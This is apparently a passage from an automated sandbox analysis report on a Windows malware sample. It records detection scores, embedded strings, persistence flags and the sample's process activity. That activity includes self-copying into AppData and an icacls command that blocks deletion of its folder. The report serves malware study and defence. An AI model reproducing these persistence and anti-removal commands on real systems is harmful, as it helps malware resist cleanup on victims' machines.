Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x*W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: 7W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: X1W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x2X	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x*W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: 7W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	2_2_00489F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	3_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	4_2_00E39F90
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	4_2_00E39F90

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	ReversingLabs: Detection: 86%
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Virustotal: Detection: 76%

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: set-addPolicy
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: setct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionSHA256sha256SHA384sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c2tnb191v3c2onb191v4c2onb191v5c2pnb208w1c2tnb239v1c2tnb239v2c2tnb239v3c2onb239v4c2onb239v5c2pnb272w1c2pnb304w1c2tnb359v1c2pnb368w1c2tnb431r1secp112r1secp112r2*
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

File read: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe --Task
Source: unknown	Process created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static file information: File size 1150976 > 1048576

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\mp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310717892.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316137935.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yewy\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\H source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\h source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\RT source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\S source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, 